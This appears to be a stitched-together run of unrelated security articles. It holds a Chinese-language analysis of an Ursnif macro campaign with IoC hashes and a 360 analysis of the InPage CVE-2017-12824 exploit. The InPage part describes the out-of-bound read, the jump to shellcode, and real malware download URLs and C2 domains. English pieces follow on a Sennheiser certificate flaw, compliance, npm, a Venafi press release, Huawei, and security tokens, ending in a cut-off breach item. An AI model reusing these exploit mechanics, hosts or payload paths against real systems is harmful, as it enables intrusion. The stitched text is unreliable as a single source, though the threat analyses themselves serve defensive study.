概述

10月9日，我们的一些客户在几个小时内接连产生相同的告警事件。根据此前已经发生的恶意活动，这一系列告警似乎与Ursnif木马有关。Ursnif是一个长期活跃的恶意软件，其根源可以追溯到2007年的ZeuS和SpyEye，该恶意软件在每一起恶意活动中都具有强大的感染能力。这一系列攻击的媒介是附带恶意Word文档的电子邮件。

在接到最初通知后，我们的威胁情报团队立即开展了深入调查，以了解这一系列恶意活动与我们在今年第二季度监控的恶意活动之间是否具有关联性。

第一次评估

虽然我们无法确认该恶意活动是针对特定地理区域的，但我们注意到大多数文件都是针对使用意大利语的用户，这表明意大利地区受到了攻击者的关注。除此之外，我们还发现了俄罗斯、乌克兰、荷兰和美国的恶意软件下载位置。我们将分析的重点，放在意大利客户在攻击发生时所受到的威胁。

邮件附件中的文档包含意大利语的提示内容，诱导用户允许宏，以查看文档内容：

Ursnif感染策略

作为Ursnif恶意活动的一部分，DOC文档使用了“该文档是使用以前版本的Microsoft Office Word创建”作为借口，要求用户启用宏。如果用户已经事先启用了宏，那么在打开文档的同时将会执行宏。如果没有，那么在用户单击“启用内容”按钮之后，恶意代码将立即运行。

我们在DOC文件中，找到经过模糊处理后的宏代码：

Microsoft Word中的宏会运行一个命令提示符，并使用参数-ec来调用PowerShell，用于对指令进行解码操作，该指令的具体内容是执行Payload的下载。下图展现了执行Microsoft Word文档中宏代码后的进程链。

经过模糊、Base 64编码、解码过程后的命令如下：

执行Microsoft Word文档宏后的进程链如下：

在这一特定的Ursnif恶意活动中，Payload使用了从1到7的递增数字编号（例如：wync1、wync5、wync7）和扩展名“.xap”命名。

Ursnif投递点结构：

在Ursnif执行cmd.exe之后，我们通过ReaQta-Hive的行为树来查看其活动：

通过cmd.exe，首先运行了powershell.exe（分析窗口#1），然后投递并运行可执行文件（分析窗口#2、#3），这是最终的Ursnif Payload。在执行最终Payload后，恶意软件开始产生恶意行为，它创建了一个用于存储下一感染阶段的注册表项。

在创建注册表项之后，Ursnif使用存储在“dhcpport”值中的命令启动进程：

我们可以通过下图，直观地看到整个过程：

该命令将运行PowerShell，随后使用invoke-expression读取和运行“bthppast”中的内容（分析窗口N#1）：

其中存储的值，就是PowerShell脚本，该脚本将直接在内存中运行。在没有更加深入的情况下，无文件攻击选择了与当前体系结构相匹配的.dll文件，并在Explorer中注入代码（分析窗口N#2），该值可以是“Client32”或“Client64”。

在注入后，explorer.exe中的恶意代码会尝试连接到C&C服务器（分析窗口N#7）。

C&C基础设施

在所有我们分析的服务器上，都具有相同的模式和文件结构。攻击者所使用的基本目录似乎在同一个恶意活动中是通用的。此外，还有3个子目录用于收集用户信息，例如：

从潜在受害者下载的恶意软件；

受害者IP地址；

所在国家；

被阻止的IP地址；

僵尸主机HID；

僵尸版本；

正常运行时间。

根目录可以在恶意软件管理端中自定义，过去我们曾发现Ursnif恶意活动使用了相同的文件结构，但文件位于不同的根文件夹下，例如“TOL”、“TYJ”、“YUY”、“MXE”等。相同的根文件夹名称似乎不会在不同的恶意活动中重复使用，并且每个名称仅在有限的时间内使用。

分配给分发服务器的根文件夹名称似乎与每起恶意活动紧密相关。从2018年8月至今，我们收集了这些文件夹的名称，每一起恶意活动都使用了唯一的文件夹名称。

WES：从11月5日使用至今；

TJY：从10月29日至11月5日；

RUI：从10月16日至10月28日；

TNT：从8月22日到10月11日；

TOL：从10月1日到10月6日；

MXE：从9月24日到10月1日；

VRE：从9月20日到9月21日；

DAB：从9月17日到9月21日；

XOE：从9月13日到9月14日；

RTT：从9月6日到9月12日；

YUY：从8月24日到9月6日；

TST：从8月20日到8月22日；

FLUX：从8月13日到8月15日。

在下图中，展示了Ursnif可执行文件的配置，其中包括僵尸版本、僵尸网络组ID、DGA（域名生成算法）数据、C&C服务器等。

Ursnif僵尸主机配置：

在Payload与C&C硬编码地址建立连接后不久，就会下载Payload并自动执行。作为数据泄露过程的一部分，.avi文件（随机文件名）将会从硬编码地址下载，该URL中包含与目标主机相关的信息，该信息经过编码后发送。

数据泄露过程：

Ursnif恶意组织可以从面板中“客户”部分监控成功感染木马的目标主机。在这一页面，显示了与受害者计算机相关的统计信息，其中包括：IP地址、受感染计算机所在国家、信息情况和木马版本。

Ursnif分布

正如我们在前面所提过的那样，C&C集中分布在乌克兰、俄罗斯、荷兰、美国和意大利。

下图显示了托管服务器每小时样本下载率的统计信息，该分析在2018年11月7日至11月12日期间进行，基于从恶意服务器提供的162493个样本。另外，有趣的是，每个下载的样本在交付之前都会自动进行修复，这样一来每个二进制文件都会具有一个独特的哈希值，这可能是一种绕过基于哈希值IoC指标检测技术的简单方法。

总结

毫无疑问，Ursnif木马仍然是当今最为活跃的威胁之一。Lolbins和无文件攻击的结合，使得Ursnif木马更加难以检测，并且使其更加容易的通过反病毒软件的扫描。

人工智能驱动的行为分析在主动检测此类威胁的过程中发挥了核心作用，Ursnif就是一个很好的例子。如今，针对恶意活动的检测与清除已经是争分夺秒，多一秒延迟就会多一分丢失业务重要信息的风险。

借助ReaQta-Hive等系统，能够迅速检测新威胁及其变种，重建有关其行为和相关风险因素的信息，在恶意软件产生任何真实损失之前快速检测、告警，并阻止潜在威胁。

IoC

8d9c9a8d24ff4e41c19c8583e3c5c48db52f147e > Logisticaservicesrl.doc

963CD36B2FBDC70F9B3AF4ED401A28BEB6F969F9 > GRobotica.doc

EDF48AC80E2505241BB4A0378363A3C79FD864B8 > Indalgo.doc

F31155687987ACE4D9F547E069789645680D7272 > Network_Connections.doc

ae4e6c49d120fa07c1112e5b70cd078654a1b009 > Logisticaservicesrl.doc

b902ccbb81c300da92c7428fc30cdc252233249e > Conform.doc

cc42e4b4a0d1a851367eb5265b4408c64aa56dab > Ligoratti.doc

e6934b62bab58efcd64db4c9774b0f9d908715a1 > MetroBlu.doc

05450C90E23CFBDFC5122D0004A6CA1A51E769C5 > praf3.xap

2600D8F9301DB916949E0D46872768022F808A7C > ledo5.xap

28B78C0B4C52222D3F6BDB9583D7EEF82EBFCEC4 > crypt_2_3105.exe

3AB9EE0B9B8E3098E1252293FC7D03E43CC69590 > hereye.exe

4E36269327981F417D59AFDED3DDE2D11BA99149 > ledo6.xap

6119095DFC0B80C6948B50E13EACAFF8929B56E3 > ledo2.xap

6502563541E8830D418A3877324F42DF0B510CE5 > ledo3.xap

7F704D1CC07575854E98783AF059371E2FCCC4E8 > ledo1.xap

99405F84372E8CBDF8B85D6C5F749FF3FFEA2764 > praf1.xap

A1C13D9922C58C38E713D3EAFCA70A2A2589C7CC > ledo4.xap

A1DEC1D4523E2E6670F6E45A3924DC4C0121CFFE > ledo7.xap

AC4B5DD954EFCC11FB2AFAB0FDE27476CB0615CF > praf5.xap

AEB75D73E802A7AF08400CED4252CA4455C0DA82 > praf6.xap

C9D09E8767344EC32FD6732173D9557F9C74A802 > praf7.xap

CBD009F09109B38C4BEC3C55E827C8FCED057D2E > praf2.xap

DEE85E063B55D8CF829950E61285078E1BD35164 > crypt_3100.exe

E5C48455F03C18F04D581AE1F95C41C81F653EF2 > praf4.xap

EB3100700F3D95B21892B045A5FF32EBAD38A831 > wync1.xap

360威胁情报中心梳理了近两年来利用InPage漏洞进行定向攻击的关键事件时间点：

用于漏洞分析的InPage漏洞利用文档在VirusTotal上的查杀情况如下：

InPage是一个专门针对乌尔都语使用者设计的文字处理软件，而与之相关的在野攻击样本涉及的漏洞编号为：CVE-2017-12824。

360威胁情报中心对该漏洞分析后发现，漏洞是由于InPage文字处理软件处理文档流时，未对需要处理的数据类型（Type）进行检查，导致越界读，通过精心构造的InPage文档可以触发执行任意代码。

我们使用InPage 2015软件环境对该漏洞进行了详细分析，过程如下。

InPage 2015

CVE-2017-12824漏洞的本质是Out-Of-Bound Read，InPage文字处理程序在处理文档中的InPage100流时未对需要处理的数据类型（Type）进行检查，而需要处理的数据类型（Type）是通过InPage文档中的某个字段指定的。这样攻击者可以通过设置一个超出Type范围的值来使得InPage程序发生越界读错误。

漏洞文档（.inp）中触发漏洞的关键数据结构如下，0x7E和0x72代表了需要处理的文档流中的某一类Type，我们将0x7E标记为Type1，0x72标记为Type2：

而InPage处理一个.inp文件的主要过程如下：

InPage首先会调用Ole!StgCreateDocfile函数解析整个.inp文件，然后调用Ole! COleStreamFile::OpenStream打开InPage文档中的InPage100数据流：

而所有InPage100流相关的处理逻辑将在PraseInPage100_432750函数中进行，并利用回调函数InPage100Read_440ED0读取流中的数据：

最终通过函数sub_453590处理触发漏洞的Type数据，也就是前面提到的0x7E和0x72。下图中的buf则是通过调用InPage100Read_440ED0读取到的包含Type的数据：

而漏洞函数sub_453590则会根据Type1和Type2（0x7E和0x72两个字节）选择对应的处理流程，首先根据Type1读取函数指针数组，然后根据Type2从函数指针数组中读取函数，最后调用该函数处理数据：

我们再来看看上图中的dword_656A28的赋值及范围：

可以看到程序在处理漏洞利用文档时的Type1 = ECX(0x1F8)>>2 = 0x7E(126)，Type2 = EDI(0x72)：

可以看到dword_656E60数组实际大小为30（0x1E）：

由于攻击者将文档中的Type2设置为了0x72，通过寻址计算后，则会越界访问函数地址0x00455AFA处的代码：

这段pop retn指令序列正好起到了“跳板”地址的作用，由于执行Type相关的处理函数时，传入的参数（指针：0x031E383F）正好指向InPage文档中某个数据流，攻击者可以将这段可控的数据流填充为ShellCode，那么pop retn指令执行完后将直接返回到攻击者设置的ShellCode中执行：

而InPage程序没有开启DEP和ASLR保护，这导致ShellCode将被直接执行：

360威胁情报中心对近期针对巴基斯坦地区利用InPage漏洞进行定向攻击的相关样本进行了详细分析，发现这一批漏洞样本的生成时间、InPage100文档流大小、初始ShellCode、相关流的标签全部一致，几乎可以确认这一系列的漏洞样本具有相同的来源。

通过对这批InPage漏洞利用文档及相关恶意代码的分析，我们发现漏洞文档携带的恶意代码分别使用了4类不同的攻击框架：4类完全不同的后门程序。相关的分析如下。

360威胁情报中心捕获的一个诱饵文档名为“SOP for Retrieval of Mobile Data Records.inp”（用于移动数据记录检索的SOP）的CVE-2017-12824漏洞利用文档，最终会下载执行一个名为wscspl的全功能后门程序。

相关漏洞利用文档信息如下：

漏洞触发成功后，ShellCode会通过搜素特殊标识“27862786”来定位主功能ShellCode，之后会从khurram.com.pk/js/drv下载Payload并保存到c:\conf\Smss.exe执行：

下载回来的EXE文件主要用于与C2通信并获取其他模块执行，执行后首先会设置注册表键值（键: HKCU\Environment，键值: AppId，数据：c:\intel\drvhost.exe）

再通过将自身添加到注册表自启动项实现持久化：

并判断当前进程路径是否为c:\intel\drvhost.exe，若不是则拷贝自身到该路径下并执行：

当进程路径满足条件后，则从注册表获取机器GUID、计算机用户名等信息加密后拼接成一个字符串：

之后发送构造好的字符串与C2：nethosttalk.com进行通信，并再次获取命令执行：

此时C2服务器返回以”AXE:#”开头的指令，本地程序通过判断指令中是否为“#”或者“.”， 以此来确定是否有后续的木马插件可以下载执行：

若”AXE:#”后跟了字符串内容，则下载执行该插件

而在360威胁情报中心分析人员调试分析的过程中，我们成功获取到一个名为“wscspl”的可以执行的插件：

木马程序运行后设置两个间隔10秒定时器：

随后创建两个线程：

命令执行代码片段如下：

木马程序所有的命令及对应功能如下表所示：

另外一个捕获到的名为AAT national assembly final.inp 的CVE-2017-12824漏洞利用文档则会释放执行Visual Basic编写的后门程序。

相关漏洞利用文档信息如下：

漏洞触发后的ShellCode首先通过内存全局搜素字符串“LuNdLuNd”定位主ShellCode：

定位到主ShellCode后获取需要使用的API函数，并通过创建互斥量“QPONMLKJIH”保证只有一个实例运行：

然后提取文档中包含的一个DLL模块，使用内存加载的方式执行：

内存加载的DLL文件是一个Dropper，包含两个资源文件，”Bin”以及”Bin2”：

其中Bin文件是Visual Basic编写的后门程序，而Bin2则是漏洞触发后释放打开的正常的inp诱饵文件，相关诱饵文档内容如下：

Bin文件是Visual Basic编写的后门程序，主要用于获取命令执行，木马运行后首先从”SOFTWARE\Microsoft\windows\CurrentVersion\Uninstall\”获取当前系统已安装的应用名：

之后判断安装应用中是否包含卡巴斯基、诺顿、趋势科技等相关杀软应用：

然后通过WMI执行select * from win32_computersystem命令获取应用程序信息，并通过判断名称中是否包含”virtual”字样来检测虚拟机环境：

若检测处于虚拟机环境下，则弹窗显示not a valid file并退出：

若检测通过后则在%Start%目录下创建”SMTP Loader.lnk”实现自启动：

最后则会与C&C： referfile.com进行通信，获取后续指令执行：

360威胁情报中心通过大数据还关联到一批使用Delphi编写的后门程序，也是通过InPage漏洞利用文档进行传播，相关样本信息如下：

捕获到的Delphi后门程序与Visual Basic编写的后门一样，也是由相似的Dropper从资源文件释放并且通过在%Start%目录下创建Adobe creative suit.lnk文件，并指向自身实现持久化：

该后门程序会在%Ducument%文件夹下创建users.txt文件，并随机写入30个字节的字符串：

木马程序会获取计算机用户名，并将计算机用户名经加密处理后保存到%Ducument%/SyLog.log文件中：

之后与C2：errorfeedback.com进行通信，以POST的方式发送SyLog.log文件的内容：

当C2返回Success时，再次以HTTP GET请求的方式与C2通信，若返回一段字符串，则继续从”errorfeedback.com/ MarkQuality455 /TTGKWoFdyQHEwpyYKmfVGtzQLfeqpJ /字符串”下载后续Payload进行执行：

另外一个捕获到的InPage漏洞利用文档最终则会执行Cobalt Strike生成的后门程序，相关文档信息如下：

漏洞触发成功后，ShellCode首先通过特殊标识“LuNdLuNd”定位到主ShellCode，随后内存加载附带的DLL并执行。

内存加载的DLL文件与上述的Visual Basic/Delphi后门一样，也是从资源释放木马文件并执行：

释放执行的Downloader名为winopen.exe，其会从jospubs.com/foth1018/simple.jpg获取具有正常JPEG文件头的加密文件，若成功获取，则从JPEG 文件第49字节开始与0x86异或解密：

解密后的文件是一个DLL文件，然后加载执行该DLL。DLL程序首先会进行运行环境判断，检测加载DLL的进程是否为rundll32.exe：

若加载进程不为rundll32.dll，则在C:\ProgramData\Adobe64下释放名为aflup64.dll的后门程序：

之后在启动目录下创建start.lnk文件，LNK文件目标为 rundll32.exe “C:\\ProgramData\\Adobe64\\aflup64.dll”,IntRun，以此实现自启动：

最后启动rundll32.exe加载aflup64.dll，并调用其导出函数IntRun：

导出函数IntRun 会再次重复前面的行为，获取JPEG文件，异或解密后执行。因为是通过rundll32启动，所以会进入另一分支，首先创建互斥量“9a5f4cc4b39b13a6aecfe4c37179ea63”：

然后在%TEMP%目录下创建“nnp74DE.tmp”文件，之后通过执行命令tasklist，ipconfig ./all，dir来获取系统进程信息、网络信息、文件列表等，将所获取到的信息保存到“nnp74DE.tmp”中：

然后获取机器ID、系统版本、系统当前时间，并以“tag FluffyBunny”开头连接所有获取的信息，并用Base64编码后连接C&C并上传：

信息传输成功后，会返回字符串”OK”的Base64编码：

如果请求上线不成功，则会循环请求上线。上线成功后会进入第二阶段，发送计算名-用户名的Base64编码数据到jospubs/foth1018/go.php，并获取命令执行：

可以获取的相关命令格式为“数字:参数”形式，共支持5个命令，相关命令列表如下：

在360威胁情报中心分析人员的调试过程中，成功获取到一个落地执行的木马插件。木马插件会从pp5.zapto.org继续获取加密后的文件：

成功获取后，经异或解密后执行，解密后的文件是由Cobalt Strike生成的远控后门：

通过360威胁情报中心大数据平台进行拓展，我们发现了一个属于同一系列攻击活动的Office CVE-2017-11882的漏洞利用文档。该文档名为“SOP for Retrieval of Mobile Data Records.doc”，这与释放wscspl木马程序（与蔓灵花同源）的InPage漏洞利用文档同名，只不过该漏洞文档针对微软Office进行攻击。

包含漏洞的Objdata对象信息如下：

漏洞成功触发执行后会通过与SOP for Retrieval of Mobile Data Records.inp（InPage）漏洞利用文件相同的下载地址获取后续Payload执行：

并且其中的多个C&C地址在360威胁情报中心的内部分析平台中也和“蔓灵花”APT组织强相关，这批C&C地址被多次使用在针对中国发起的攻击活动中。故相关的攻击活动可以确认为“蔓灵花”所为。

360威胁情报中心通过对相同来源（漏洞利用文档在生成时间、ShellCode、InPage100流大小、流的固定特征）的一系列针对巴基斯坦的攻击样本分析后发现，同一来源的攻击样本分别使用了至少4套不同的恶意代码框架，并分别与“蔓灵花”、“摩诃草”（BITTER）、“Confucius”、“Bahamut”APT组织产生了或多或少的关联。或许这些APT组织应该归属于同一组织？亦或者这些APT组织拥有相同的数字武器来源（APT组织幕后的支持者向这些APT团伙派发了相同的漏洞利用生成工具）？

以下是360威胁情报中心针对本文中相关的APT组织的TTP进行的简单对比，以供参考：

Why it matters:Connecting to a site with HTTPS gives users a sense of privacy and security. For users of Sennheiser's HeadSetup software, a flaw allowed for false certificates to be installed while appearing legitimate, giving way to man-in-the-middle attacks.

A flaw in Sennheiser's HeadSetup software that works with the company's headphones has been discovered that allows for man-in-the-middle attacks to be carried out. German consulting firm Secorvo has published a vulnerability report and Sennheiser has updated its software to eliminate the threat.

The vulnerability in question occurs because the software was installing a root certificate and an encrypted private key to the Trusted Root CA Certificate store. By doing so, a spoofed certificate could be generated and appear as a valid certificate to end users. Connecting to HTTPS sites would still show a secure connection, even though a malicious entity could gain access to any data transmitted.

In HeadSetup and HeadSetup Pro, the vulnerable certificates will no longer be installed. Sennheiser has published a script that will remove affected certificates from affected computers as well as a guide using Active Directory and Group Policy Editor to achieve the same result.

Not unlike Lenovo'sSuperfish software, Sennheiser's mistake leaves users open to the same type of forgery attack. The main difference though is that Sennheiser is not abusing the flaw, it was simply an unknown security issue.

To make matters worse, browsers such as Google Chrome will not detect forged certificates that are linked with correctly installed root certificates. Certificate pinning is a known type of attack that is mitigated by modern browsers, but does not work in this case because the chain of trust does not appear broken at any step.

Both windows and MacOS users are believed to be affected by the issue, but the solutions are already available . If using Sennheiser's HeadSetup or HeadSetup Pro software, update it immediately to the latest version.

Many folks get confused about the difference between security and compliance. Many, especially those less technically inclined, assume that fulfilling compliance obligations sufficiently addresses security. Unfortunately, that’s not true as demonstrated by the continuing rise of security breaches each year. In this post, I’ll briefly explain the difference between security and compliance, and then outline several specific steps companies can take to get moving on security.

Security is about minimizing risk. For companies that invest in security controls and resources, the goal of those investments is to minimize the likelihood of an attack, the potential success for an attack, and the ultimate impact of a successful attack. Sometimes those investments pay off, but other times they are not enough and attackers get in anyway.

Compliance is just one piece of that security puzzle. The goal of compliance efforts is to minimize the risk to the organization from regulatory and contractual authorities. Hopefully, those compliance requirements are built on well-founded security principles so that in the process of complying, the business is also becoming more secure. But that’s not always the case. Often compliance requirements are too vague to be effectual, and other times they are too specific to be practical. Unfortunately, that means that just checking off compliance boxes does not necessarily make you more secure.

Most organizations are required to address a wide range of compliance obligations. Many of these are required by federal law such as HIPAA and Sarbanes Oxley. State-based requirements also get thrown in, such as the CyberSecurity regulations passed last year by the New York Department of Financial Services. And then there are contractual requirements built into legal agreements such as PCI and others. All of these present risk to the organization if not appropriately addressed, but ultimately the primary focus of each is to satisfy an auditor rather than to stop an attacker.

Regardless of where you are in your security journey, there are several key things you should be doing. Every organization has a responsibility to protect its assets.

This brief list is not exhaustive at all, but hopefully, it will provide some guidance on moving your security program to the next level. If you have questions about how to get started or need more guidance, please let us know.

Nathan Sweaneyis a SeniorSecurity Consultant with Secure Ideas. If you need help analyzing your security needs or have questions about compliance you can contact him at nathan@secureideas.com , on Twitter @sweaney , or visit the Secure Ideas ProfessionallyEvil site for services provided.

The latest NPM dependency fiasco has got me thinking again about dependency management. While this used to be a discussion that was limited to those of us who create Node apps, these days, with popular frontend frameworks like React, it’s rare to find a modern web application that doesn’t use NPM in some capacity.

For almost a decade I have stood firmly on the side that you should define your dependencies in your package.json and trust the magic of semantic versioning. I believed this was truly the best way to ensure you always had the latest security patches and performance improvements for the modules your application depends on. I fought this fight with my teams, colleagues, and peers. Even when left-pad broke the internet I stood my ground.

This latest issue gives me a chance to revisit my thinking and I have to admit I have changed my mind. The time has come, I give in. You should commit your Node modules to your source control repository. There I said it. I feel better.

While for a long time I felt like, in addition to the arguments I mentioned above, by taking the package.json stance, I was somehow defending a core belief of the Node community, but the truth is the Node community threw the towel in on this fight a while ago.

First there was npm shrinkwrap , then the folks at Facebook came up with yarn . Finally NPM introduced package-lock and version locking your dependency tree became part of the Node gospel.

While the debate is definitely still raging about whether or not you should lock your dependencies, and there are a ton of people who know a lot more package management than I do, I am just going to assume that ship has sailed and we now live in a world of dependency locking.

Since we are already version locking our dependencies the only question that’s left is should we keep downloading those dependencies from NPM every time we build? At this point I just don’t see the benefit. At Convox, when we work with people to help speed up Docker builds more often than not what we see are thousands of lines, and many minutes, of NPM install messages. Why not just commit our Node modules and save that entire build step, not to mention avoiding the potential risk of an NPM outage or security breach.

Another way to look at is what’s the downside to committing our Node modules? Sure you slightly increase the size of your source code repository but is that really an issue? Unless you are operating at Facebook scale , I doubt this will have an impact on your team. Otherwise it seems like it’s all upside to me. The one warning I will give is really more about version locking. You do have to remember to periodically review and upgrade the Node modules that you are using to ensure you are gaining the benefits of security fixes etc…but you will no longer have to worry about a Node module breaking or being unpublished when you are in the middle of trying to get a production build live. One note is that Github Security Alerts are really good at catching security issues so make sure you set them up for your repositories. So commit away, it’s the smart thing to do!

Now that you have an application that builds super quickly we would love to help you get it into production so check outConvox when you get the chance!

New funding to accelerate growth and support new Machine Identity Protection Development Fund

Recent Articles By Author

Check Point Software Integrates with New Amazon Web Services Security Hub, Bringing Enhanced Cloud Protection to Its Consolidated Security Platform Aqua Security and Pivotal Team Up to Bring New Application Security Solution to the Enterprise PureSec raises $7 million to protect serverless applications

SALT LAKE CITY November 29, 2018 Venafi , the leading provider of machine identity protection, today announced the closing of a $100 million round of financing, led by TCV with additional participation from existing investors, QuestMark Partners and NextEquity Partners. TCV is one of the largest and most respected providers of capital to growth-stage private and public companies in the technology industry and has backed industry-leading companies, including Airbnb, Alarm.com, Cradlepoint, Genesys, Netflix, Rapid7, Silver Peak, Splunk, Spotify and Zillow. As part of the transaction, TCV general partner, Jake Reynolds, joins Venafi’s board of directors.

The funding will be used to accelerate Venafi’s growth and to cement the firm’s growing market leadership. In addition to fueling growth, $12.5 million of the investment will be made available to third-party developers in the first tranche of the new Machine Identity Protection Development Fund. Venafi created the fund to accelerate the integration of machine identity intelligence into a wide range of machines in the enterprise and further enhance and expand the machine identity ecosystem. The fund will allow developers, including consultancies, systems integrators, fast-moving startups, open source developers and cybersecurity vendors to apply for sponsorship. This sponsorship will allow recipients to build integrations that deliver greater visibility, intelligence and automation for Venafi customers across any technology that creates or consumes machine identities.

“Identity is the foundation of security,” said Jeff Hudson, CEO of Venafi. “The cyber world is made up of machines, and all machines require identities for the cyber world to be secure.As a society, we understand the risks associated with human identity theft very well, and we spend over $8 billion per year protecting human identities. However, most organizations don’t yet understand the risks associated with machine identities and, as a result, spend almost nothing to protect them. This leaves our global digital economy at risk. TCV has a long history of partnering with the world’s leading technology firms, so we’re very excited about the opportunity to work with them. Their investment and expertise will help us ensure that the world’s machines, including hardware and software from smart machines, virtual servers, applications, containers, and more, are connected, safe and secure.”

Just as usernames and passwords are used to identify and authenticate humans, machine identities enable the trusted relationships between machines that control the flow of sensitive data. Because machine identities are poorly understood and often unprotected, they are subject to being exploited by cybercriminals. The Venafi platform protects the machine identities whose underlying technology is cryptographic keys and digital certificates by providing unparalleled visibility, intelligence and automation.

“The team at TCV is excited about our partnership with Venafi,” said Jake Reynolds, general partner at TCV. “DevOps and IoT are driving growth in the number of machines thanks to cloud computing, virtualization, and the proliferation of connected devices. Venafi is well-positioned to provide the machine identity protection for all enterprise machines, and we look forward to supporting the Venafi team as they continue to scale in this rapidly expanding market.”

With over 30 patents, Venafi delivers innovative machine identity protection solutions for the world’s most demanding, security-conscious Global 5000 organizations, including the top five U.S. health insurers; the top five U.S. airlines; four of the top five U.S. retailers; and four of the top five banks in each of the following countries: U.S., U.K., Australia and South Africa.

Venafiis the inventor and cybersecurity market leader in machine identity protection, securing connections and communications between machines. Venafi protects machine identity types by orchestrating cryptographic keys and digital certificates for SSL/TLS, IoT, mobile and SSH. Venafi provides global visibility of machine identities and the risks associated with them for the extended enterprise―on premises, mobile, virtual, cloud and IoT―at machine speed and scale. Venafi puts this intelligence into action with automated remediation that reduces the security and availability risks connected with weak or compromised machine identities while safeguarding the flow of information to trusted machines and preventing communication with untrusted machines.

For more information, visit: www.venafi.com .

Founded in 1995, TCV provides capital to growth-stage private and public companies in the technology industry. Since inception, TCV has invested over $10 billion in leading technology companies and has helped guide CEOs through more than 115 IPOs and strategic acquisitions. TCV’s investments include Airbnb, Altiris, AxiomSL, Dollar Shave Club, EmbanetCompass, EtQ, ExactTarget, Expedia, Facebook, Fandango, GoDaddy, HomeAway, LinkedIn, Netflix, OSIsoft, Rent the Runway, Sitecore, Splunk, Spotify, Varsity Tutors, and Zillow. TCV is headquartered in Menlo Park, California, with offices in New York and London. For more information about TCV, including a complete list of TCV investments, visit https://www.tcv.com/ .

Less than a month after Huawei narrowed its 5G ambitions in New Zealand by offering to supply carrier Spark with basic 5Gradio transmitters rather than “core” networking hardware, New Zealand has blocked the company’s bid on national security grounds ― but left the door open for further discussion. Now Huawei is attempting to determine what led to the decision, which comes after theU.S. andAustralia more comprehensively banned Huawei 5G networking gear.

New Zealand’s decision to stop Spark from using Huawei 5G hardware appears to be narrower and different than other countries’ bans, though its rationale is presently somewhat cloudy. Speaking on national radio, New Zealand’sGovernment Communications Security Bureau (GCSB) ministerAndrew Little specifically downplayedthe suggestion that the decision was an issue with China, or Huawei in particular.

“It’s not about the country, it’s not even particularly about the company, it’s about the technology that is proposed,” Little said (via ChannelNewsAsia ).“I can say with considerable confidence that there’s been no representations made to the GCSB from Australia, from the United States, from anywhere, about how it should go about making its decision.”

New Zealand is proceeding cautiously with its decision, as it depends heavily upon its economic relationship with China ― Huawei’s largest supporter. The countries do around $18 billion in annual import-export business, enough to make China the smaller country’s largest trading partner. By comparison, the United States and China exchange around $3.5 trillion in goods each year, but the U.S. is currently treating the relationship as adversarial, and lobbying multiple countries to avoid Huawei products.

Though Littlecited “classified information” in refusing to discuss the country’s specific national security concerns, the issue appears to be the potential for disruption of core network functionality by radio hardware at the 5G network’s edge. While Spark proposed to use Huawei gear solely for radio transmissions at its network’s edge, there are concerns that edge hardware will play a larger role in the 5G era than in 3G and 4G networks, and possibly jeopardize overall network security.

Rather than blocking Huawei altogether, New Zealanddirected Spark to consult the GCSB to see if there was a way to reduce risks of working with the company ― a measure that Huawei now seeks to understand. According to Reuters, Huawei’s New Zealand office is urgently seeking a meeting with the government, saying that it would “welcome the opportunity to actively address any concerns and work together to find a way forward.”

The subject of standards in the security token space might be a sensitive one. Obviously, there is a segment of the community that believes in the need for standardization. I tend subscribe to a different thesis. The security token space is too nascent, it still missing 99% of the infrastructure required to be a relevant vehicle for securities and there are simply not enough security tokens issued to make a statistically-significant sample. At this stage, standards act more like a constraining force rather than a vehicle for innovation. At this point, we simply don’t know enough about how security tokens are going to evolve and we certainly haven’t encountered any challenges that requires standardization. In my opinion, “standards without applications are figments of hallucination.”

Technological history shows us that the best standards evolve from innovation and competition between market participants. The goal of standards is to solve interoperability and portability challenges that can streamline the adoption of a technology segment. Unfortunately, many times standards become a vehicle for bureaucracy and for technology vendors to project fake thought leadership positions by creating the “rules of the game”.

To illustrate this point, let’s take two examples of different approaches to standardization in recent technology movements.

A few years ago, service oriented architecture(SOA) was positioned as an architecture style that could finally solve interoperability between systems in the enterprise by using an artifact known as web services. From the get-go, SOA triggered an intense rivalry between technology incumbents like Microsoft, IBM, Oracle, Tibco, SAP and many others. Even before SOA had achieve any meaningful traction, the vendors established two standards known as the Simple Object Access Protocol(which was neither simple nor a protocol) and the Web Service Description Language(WSDL). That was just the beginning, committees in organizations like W3C and OASIS started pushing new web services standards for every single aspect from basic communication to sophisticated security. The WS-* protocols introduced incredibly levels of complexities to the point that it was impossible for their own creators to implement them. The end result was the entire industry shifted to simpler approaches like the representational state transfer(REST) that rely on universal internet protocols such as HTTP instead of committee-designed standards.

A great example of how standards should evolve organically from competition is the

browsers you are using to read this blog. For decades, browsers have been at the center of intense battles between companies such as Microsoft, NetScape, Opera, Google, Apple and many others. The intense innovation has caused consumers to use different browsers forcing the need for interoperability. As a result, the best technologies in the space such as html5 or Google v8 become widely adopted within the entire ecosystem.

Bringing some of the lessons from key technology movements into security tokens, we can identify some of the core principles behind good and bad standardization.

In the context of security tokens, standards should focus less on the structure of the tokens and more on the areas of the market that require interactions between different participants. Here are five examples of areas that I think are better suited for standardization than others:

Integration with Exchanges: Aspects such as listing, transferring, notifications are a good candidate for standarization as they require interoperability between different players. Additionally, security token exchanges are building on years of research in crypto -exchanges which make it a bit more mature scenario to adopt standards.

Disclosures: Protocols for publishing and disclosing material pubic information about security tokens is another area in which standards can be relevant. Universal protocol for disclosures that can be integrated into exchanges or token issuance platforms are desperately needed in the security token space

On-Chain Compliance: I believe many regulatory aspects of security tokens will be expressed in some form of on-chain protocol and smart contracts. Given the extensive regulatory knowledge in financial markets, this can be another solid area for standardization.

Liquidity: Arguably the biggest challenge in the security token market, liquidity mechanics must be somewhat present at the protocol level and not rely solely on market interactions. Some of the ideas from protocols like Bancor can be adapt it into the security tokens in the form of standards that can be incorporated at the token and exchange level.

Ownership: Security tokens are ultimately about expressing ownership claims. While the blockchain provides all the necessary building blocks for expressing legally-viable ownership constructs, standards in this area might help to streamline the adoption of security tokens.

Other areas such as privacy, dividend distribution or governance are likely to become relevant in terms of security token standards as the space evolves.

The subject of standards is likely to continue being a passionate area of debate in the security token space. If the security token market is successful, standards will evolve organically and the areas of standardization will become painfully visible. At this moment, we don’t need standards, we need more and better security tokens. After all, a security token standard that hasn’t been implemented in any security tokens is the definition of an oxymoron.

A credential stuffing attack has allowed hackers to take a big bite out of Dunkin’ Donuts customer data. The donut giantannounced Tuesday evening that a data breach in October may have led to customers’ personal information being compromised.

